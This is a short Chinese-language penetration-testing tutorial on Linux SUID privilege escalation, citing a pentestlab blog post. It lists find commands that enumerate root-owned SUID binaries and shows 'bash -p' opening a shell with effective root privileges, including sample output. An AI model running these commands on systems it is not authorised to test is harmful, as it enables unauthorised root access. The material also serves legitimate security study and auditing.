SUID是Linux的一種權限機制,具有這種權限的文件會在其執行時,使調用者暫時獲得該文件擁有者的權限。如果擁有SUID權限,那么就可以利用系統中的二進制文件和工具來進行root提權。
以下命令可以發現系統上運行的所有SUID可執行文件。具體來說,命令將嘗試查找具有root權限的SUID的文件。
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;
以上所有二進制文件都將以root用戶權限執行,因為它們的權限中包含"s",並且對應的是root權限。
Bash
以下命令將以root權限打開一個bash shell。
bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
參考鏈接:
https://pentestlab.blog/2017/09/25/suid-executables/